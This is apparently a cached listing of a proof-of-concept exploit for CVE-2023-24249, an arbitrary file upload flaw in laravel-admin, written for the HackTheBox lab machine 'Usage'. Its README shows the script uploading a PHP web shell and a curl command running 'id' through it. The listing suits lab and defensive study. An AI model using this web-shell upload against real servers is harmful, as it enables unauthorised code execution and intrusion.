CVE-2023-24249 PoC — laravel-admin 代码问题漏洞

Source

https://github.com/ldb33/CVE-2023-24249-PoC

Associated Vulnerability

Title:laravel-admin 代码问题漏洞 (CVE-2023-24249)
Description:z-song laravel-admin是一款用于Laravel Web开发框架的管理界面构建器。 laravel-admin v1.8.19版本存在安全漏洞，该漏洞源于存在任意文件上传漏洞，攻击者利用该漏洞可以通过精心制作的PHP文件执行任意代码。

Description

Proof of concept for HTB easy machine Usage

Readme

# CVE-2023-24249 PoC
[CVE-2023-24249](https://nvd.nist.gov/vuln/detail/CVE-2023-24249) is an arbitrary file upload vulnerability in laravel-admin v1.8.19. This proof of concept exploits the vulnerability to upload a web shell.

The exploit was written to use against the HackTheBox easy machine [Usage](https://app.hackthebox.com/machines/Usage).

# Example
```
python3 CVE-2023-24249.py
[+] Web shell uploaded to http://admin.usage.htb/uploads/images/df18111ffa9f40264b52624c7d7d21b1.php

curl http://admin.usage.htb/uploads/images/df18111ffa9f40264b52624c7d7d21b1.php?c=id                                            
uid=1000(dash) gid=1000(dash) groups=1000(dash)
```

File Snapshot


 [4.0K]  /data/pocs/7a226f7a9670e41c671fd27d6de3fb05a5ebb7c8
├── [1.0K]  CVE-2023-24249.py
└── [ 671]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!